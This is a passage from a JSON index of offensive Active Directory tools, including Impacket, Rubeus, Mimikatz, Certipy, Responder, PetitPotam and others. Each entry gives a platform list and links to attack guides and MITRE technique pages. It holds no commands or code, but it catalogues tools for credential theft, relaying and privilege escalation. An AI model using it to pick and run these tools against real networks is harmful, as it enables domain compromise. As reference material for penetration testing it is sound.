t-lookupsid","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/lookupsid.py","https://www.puckiestyle.nl/impacket/"],"count":1},{"id":"wadcoms:Impacket-ntlmrelayx","name":"Impacket-ntlmrelayx","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/","https://github.com/fortra/impacket/blob/master/examples/ntlmrelayx.py","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://www.thehacker.recipes/ad/movement/ntlm/relay","https://www.thehacker.recipes/ad/movement/credentials/dumping/laps","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/relay","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials"],"count":10},{"id":"wadcoms:Impacket-psexec","name":"Impacket-psexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py","https://www.sans.org/blog/psexec-python-rocks/","https://book.hacktricks.xyz/windows/active-directory-methodology/pass-the-ticket#pass-the-ticket-attack"],"count":2},{"id":"wadcoms:Impacket-rbcd","name":"Impacket-rbcd","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rbcd.py","https://github.com/tothi/rbcd-attack"],"count":1},{"id":"wadcoms:Impacket-rpcdump","name":"Impacket-rpcdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/rpcdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-reg","name":"Impacket-reg","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/reg.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-samrdump","name":"Impacket-samrdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/samrdump.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbclient","name":"Impacket-smbclient","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbclient.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-smbexec","name":"Impacket-smbexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py","https://www.varonis.com/blog/insider-danger-stealthy-password-hacking-with-smbexec/"],"count":1},{"id":"wadcoms:Impacket-secretsdump","name":"Impacket-secretsdump","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#secretsdumppy"],"count":2},{"id":"wadcoms:Impacket-services","name":"Impacket-services","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/services.py","https://www.hackingarticles.in/impacket-guide-smb-msrpc/"],"count":1},{"id":"wadcoms:Impacket-wmiexec","name":"Impacket-wmiexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/wmiexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/#wmiexecpy"],"count":1},{"id":"wadcoms:Impacket-addcomputer","name":"Impacket-addcomputer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/addcomputer.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-atexec","name":"Impacket-atexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py","https://u0041.co/blog/post/1"],"count":2},{"id":"wadcoms:Impacket-getST","name":"Impacket-getST","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","http://blog.redxorblue.com/2019/12/no-shells-required-using-impacket-to.html"],"count":2},{"id":"wadcoms:Impacket-getTGT","name":"Impacket-getTGT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/getTGT.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Kerbrute","name":"Kerbrute","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ropnop/kerbrute"],"count":4},{"id":"wadcoms:LDAPSearch","name":"LDAPSearch","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://linux.die.net/man/1/ldapsearch"],"count":2},{"id":"wadcoms:Mitm6","name":"Mitm6","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/mitm6","https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/"],"count":1},{"id":"wadcoms:NetExec","name":"NetExec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory","macOS"],"references":["https://blog.redteam-pentesting.de/2025/windows-coercion/","https://github.com/Pennyw0rth/NetExec","https://www.netexec.wiki/smb-protocol/scan-for-vulnerabilities","https://www.netexec.wiki/","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://cybersecurity.bureauveritas.com/blog/timeroasting-attacking-trust-accounts-in-active-directory","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.netexec.wiki/ldap-protocol/enumerate-machineaccountquota","https://attack.mitre.org/techniques/T1087/002/","https://www.netexec.wiki/mssql-protocol/command-execution","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netexec.wiki/mssql-protocol/authentication","https://www.netexec.wiki/mssql-protocol/mssql-privesc","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://www.netexec.wiki/smb-protocol/obtaining-credentials/gpp-password","https://attack.mitre.org/techniques/T1552/006/","https://www.netexec.wiki/smb-protocol/obtaining-credentials/dump-keepass","https://www.netexec.wiki/smb-protocol/spidering-shares","https://www.netexec.wiki/smb-protocol/obtaining-credentials/veeam","https://www.netexec.wiki/getting-started/using-modules","https://www.netexec.wiki/getting-started/selecting-and-using-a-protocol"],"count":27},{"id":"wadcoms:Nmap","name":"Nmap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://nmap.org/download.html","https://nmap.org/nsedoc/scripts/krb5-enum-users.html"],"count":1},{"id":"wadcoms:PKINIT","name":"PKINIT","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/dirkjanm/PKINITtools","https://dirkjanm.io/ntlm-relaying-to-ad-certificate-services/"],"count":2},{"id":"wadcoms:PSADmodule","name":"PSADmodule","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/samratashok/ADModule"],"count":1},{"id":"wadcoms:PetitPotam","name":"PetitPotam","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/topotam/PetitPotam","https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory"],"count":1},{"id":"wadcoms:Powershell","name":"Powershell","source":"WADComs","platform":["Windows"],"references":["https://docs.microsoft.com/en-us/powershell/module/activedirectory/","https://github.com/samratashok/ADModule","https://www.labofapenetrationtester.com/2018/10/domain-enumeration-from-PowerShell-CLM.html"],"count":1},{"id":"wadcoms:PwshADmodule","name":"PwshADmodule","source":"WADComs","platform":["Windows"],"references":["https://redfoxsec.com/blog/attacking-kerberos-delegation/","https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://github.com/samratashok/ADModule","https://docs.microsoft.com/en-us/powershell/module/activedirectory/"],"count":2},{"id":"wadcoms:PyLDAPmonitor","name":"PyLDAPmonitor","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/python"],"count":1},{"id":"wadcoms:PyWhisker","name":"PyWhisker","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/shutdownrepo/pywhisker"],"count":1},{"id":"wadcoms:RPCClient","name":"RPCClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","https://www.ired.team/offensive-security/enumeration-and-discovery/enumerating-windows-domains-using-rpcclient-through-socksproxy-bypassing-command-line-logging"],"count":1},{"id":"wadcoms:Regexe","name":"Regexe","source":"WADComs","platform":["Windows"],"references":["https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/","https://www.hackingarticles.in/windows-persistence-using-winlogon/","https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/reg","https://docs.microsoft.com/en-us/windows-hardware/drivers/install/runonce-registry-key"],"count":1},{"id":"wadcoms:Responder","name":"Responder","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lgandx/Responder","https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/llmnr-nbtns-mdns-spoofing","https://attack.mitre.org/techniques/T1557/001/"],"count":2},{"id":"wadcoms:Rubeus","name":"Rubeus","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Rubeus","https://github.com/GhostPack/Rubeus#asreproast","https://github.com/GhostPack/Rubeus#asktgt","https://github.com/GhostPack/Rubeus#brute","https://github.com/GhostPack/Rubeus#kerberoast","https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/constrained-delegation","https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-kerberos-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/ptt","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/diamond-ticket","https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1558/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/over-pass-the-hash-pass-the-key","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/unconstrained-delegation"],"count":15},{"id":"wadcoms:SMBClient","name":"SMBClient","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://www.samba.org/samba/docs/current/man-html/smbclient.1.html","https://www.madirish.net/59"],"count":5},{"id":"wadcoms:SMBMap","name":"SMBMap","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/ShawnDEvans/smbmap","https://www.nopsec.com/blog/smbmap-wield-it-like-the-creator/"],"count":3},{"id":"wadcoms:SafetyKatz","name":"SafetyKatz","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SafetyKatz","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Seatbelt","name":"Seatbelt","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Seatbelt","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpDump","name":"SharpDump","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpDump","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpHound","name":"SharpHound","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/SharpHound3","https://bloodhound.readthedocs.io/en/latest/data-collection/sharphound.html","https://bloodhound.specterops.io/collect-data/ce-collection/sharphound","https://github.com/ZishanAdThandar/pentest/blob/main/notes/ActiveDirectory.md#bloodhound"],"count":2},{"id":"wadcoms:SharpLDAPmonitor","name":"SharpLDAPmonitor","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/LDAPmonitor/tree/master/csharp"],"count":1},{"id":"wadcoms:SharpUp","name":"SharpUp","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/SharpUp","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:SharpWMI","name":"SharpWMI","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpWMI","https://www.harmj0y.net/blog/redteaming/ghostpack/"],"count":1},{"id":"wadcoms:Snaffler","name":"Snaffler","source":"WADComs","platform":["Windows","ActiveDirectory"],"references":["https://github.com/SnaffCon/Snaffler"],"count":1},{"id":"wadcoms:Windapsearch","name":"Windapsearch","source":"WADComs","platform":["Linux","Windows"],"references":["https://github.com/ropnop/windapsearch","https://www.attackdebris.com/?p=470"],"count":1},{"id":"wadcoms:bloodyAD","name":"bloodyAD","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CravateRouge/bloodyAD","https://adminions.ca/books/active-directory-enumeration-and-exploitation/page/bloodyad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse","https://www.thehacker.recipes/ad/movement/dacl/addmember","https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://www.thehacker.recipes/ad/movement/dacl/forcechangepassword","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":9},{"id":"wadcoms:lsassy","name":"lsassy","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://en.hackndo.com/remote-lsass-dump-passwords/","https://github.com/login-securite/lsassy?tab=readme-ov-file"],"count":1},{"id":"wadcoms:targetedKerberoast","name":"targetedKerberoast","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/targetedKerberoast"],"count":1},{"id":"wadcoms:winPEAS","name":"winPEAS","source":"WADComs","platform":["Windows"],"references":["https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS","https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASexe/README.md","https://book.hacktricks.xyz/windows/windows-local-privilege-escalation"],"count":1},{"id":"wadcoms:adidnsdump","name":"adidnsdump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/adidnsdump","https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/","https://attack.mitre.org/techniques/T1590/002/"],"count":1},{"id":"wadcoms:Certify","name":"Certify","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation"],"count":1},{"id":"wadcoms:Certipy","name":"Certipy","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows","macOS"],"references":["https://github.com/ly4k/Certipy","https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-and-some-thoughts-on-mitigations-c9d38edc7723","https://www.thehacker.recipes/ad/movement/adcs","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/kerberos/pkinit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation","https://www.thehacker.recipes/ad/movement/adcs/access-controls","https://www.thehacker.recipes/ad/movement/adcs/certificate-templates","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference","https://github.com/ly4k/Certipy/wiki"],"count":14},{"id":"wadcoms:Coercer","name":"Coercer","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/p0dalirius/Coercer","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/","https://podalirius.net/en/articles/coercer-an-automatic-authentication-coercion-tool/"],"count":2},{"id":"wadcoms:Comsvcs","name":"Comsvcs","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://lolbas-project.github.io/lolbas/Libraries/comsvcs/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:CVE","name":"CVE","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Bdenneu/CVE-2022-33679","https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html","https://horizon3.ai/attack-research/attack-blogs/from-cve-2022-33679-to-unauthenticated-kerberoasting/"],"count":1},{"id":"wadcoms:DFSCoerce","name":"DFSCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Wh04m1001/DFSCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-dfsnm"],"count":1},{"id":"wadcoms:DonPAPI","name":"DonPAPI","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/login-securite/DonPAPI","https://www.login-securite.com/2022/03/28/donpapi/"],"count":1},{"id":"wadcoms:EfsPotato","name":"EfsPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/zcgonvh/EfsPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:GodPotato","name":"GodPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/BeichenDream/GodPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato","https://attack.mitre.org/techniques/T1134/002/"],"count":1},{"id":"wadcoms:Hashcat","name":"Hashcat","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://hashcat.net/wiki/doku.php?id=example_hashes","https://www.thehacker.recipes/ad/movement/kerberos/asreproast","https://attack.mitre.org/techniques/T1558/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/005/","https://www.thehacker.recipes/ad/movement/kerberos/kerberoast","https://attack.mitre.org/techniques/T1558/003/","https://github.com/evilmog/ntlmv1-multi","https://crack.sh/netntlm/","https://www.thehacker.recipes/ad/movement/ntlm/capture","https://attack.mitre.org/techniques/T1110/002/","https://github.com/fortra/impacket/blob/master/examples/secretsdump.py","https://attack.mitre.org/techniques/T1003/002/"],"count":6},{"id":"wadcoms:Impacket-dacledit","name":"Impacket-dacledit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-rights","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-describeTicket","name":"Impacket-describeTicket","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:Impacket-findDelegation","name":"Impacket-findDelegation","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/kerberos/delegations","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/constrained-delegation"],"count":1},{"id":"wadcoms:Impacket-goldenPac","name":"Impacket-goldenPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://github.com/fortra/impacket/blob/master/examples/goldenPac.py","https://attack.mitre.org/techniques/T1558/"],"count":1},{"id":"wadcoms:Impacket-mssqlclient","name":"Impacket-mssqlclient","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.thehacker.recipes/ad/movement/mssql","https://www.thehacker.recipes/ad/movement/mssql/execution"],"count":2},{"id":"wadcoms:Impacket-owneredit","name":"Impacket-owneredit","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/dacl/grant-ownership","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/acl-persistence-abuse"],"count":1},{"id":"wadcoms:Impacket-raiseChild","name":"Impacket-raiseChild","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://www.thehacker.recipes/ad/movement/domain-trusts/child-parent","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/sid-history-injection"],"count":1},{"id":"wadcoms:Impacket-ticketConverter","name":"Impacket-ticketConverter","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://www.thehacker.recipes/ad/movement/kerberos/ptt"],"count":1},{"id":"wadcoms:John","name":"John","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/openwall/john","https://hashcat.net/wiki/doku.php?id=example_hashes","https://attack.mitre.org/techniques/T1555/005/","https://www.thehacker.recipes/ad/movement/kerberos/pass-the-certificate","https://attack.mitre.org/techniques/T1110/002/"],"count":2},{"id":"wadcoms:JuicyPotatoNG","name":"JuicyPotatoNG","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/antonioCoco/JuicyPotatoNG","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/juicypotato"],"count":1},{"id":"wadcoms:Krbrelayx","name":"Krbrelayx","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://dirkjanm.io/krbrelayx-unconstrained-delegation-abuse-toolkit/","https://www.thehacker.recipes/ad/movement/kerberos/delegations/unconstrained"],"count":1},{"id":"wadcoms:LaZagne","name":"LaZagne","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/AlessandroZ/LaZagne","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/"],"count":1},{"id":"wadcoms:ldapdomaindump","name":"ldapdomaindump","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/ldapdomaindump","https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldapnomnom","name":"ldapnomnom","source":"DAEMON","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/lkarlslund/ldapnomnom","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:ldeep","name":"ldeep","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/franc-pentest/ldeep","https://www.hackingarticles.in/active-directory-enumeration-ldeep/","https://attack.mitre.org/techniques/T1087/002/"],"count":1},{"id":"wadcoms:MANSPIDER","name":"MANSPIDER","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/blacklanternsecurity/MANSPIDER","https://www.blacklanternsecurity.com/2020-11-04-MANSPIDER/"],"count":1},{"id":"wadcoms:Mimikatz","name":"Mimikatz","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/gentilkiwi/mimikatz","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates","https://attack.mitre.org/techniques/T1552/004/","https://www.dcshadow.com/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcshadow","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dcsync","https://attack.mitre.org/techniques/T1003/006/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/","https://book.hacktricks.xyz/windows-hardening/stealing-credentials/credentials-mimikatz","https://attack.mitre.org/techniques/T1003/002/","https://attack.mitre.org/techniques/T1003/004/","https://book.hacktricks.xyz/windows-hardening/ntlm/pass-the-hash","https://attack.mitre.org/techniques/T1550/002/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/pass-the-ticket","https://attack.mitre.org/techniques/T1550/003/","https://adsecurity.org/?p=1275","https://attack.mitre.org/techniques/T1556/001/"],"count":10},{"id":"wadcoms:Nanodump","name":"Nanodump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/fortra/nanodump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:Nltest","name":"Nltest","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)","https://attack.mitre.org/techniques/T1482/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:noPac","name":"noPac","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Ridter/noPac","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PowerMad","name":"PowerMad","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/Kevin-Robertson/Powermad","https://www.thehacker.recipes/ad/movement/domain-settings/machineaccountquota","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/resource-based-constrained-delegation"],"count":1},{"id":"wadcoms:PowerUpSQL","name":"PowerUpSQL","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/NetSPI/PowerUpSQL","https://www.netspi.com/blog/technical-blog/network-penetration-testing/how-to-hack-database-links-in-sql-server/","https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server","https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/","https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/"],"count":3},{"id":"wadcoms:PowerView","name":"PowerView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/PowerShellMafia/PowerSploit","https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993","https://www.thehacker.recipes/ad/movement/dacl/","https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://wald0.com/?p=112","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":11},{"id":"wadcoms:pre2k","name":"pre2k","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/garrettfoster13/pre2k","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":2},{"id":"wadcoms:PrinterBug","name":"PrinterBug","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/dirkjanm/krbrelayx","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:PrintSpoofer","name":"PrintSpoofer","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/itm4n/PrintSpoofer","https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Procdump","name":"Procdump","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://learn.microsoft.com/en-us/sysinternals/downloads/procdump","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:pyGPOAbuse","name":"pyGPOAbuse","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/Hackndo/pyGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":1},{"id":"wadcoms:Pypykatz","name":"Pypykatz","source":"DAEMON","platform":["L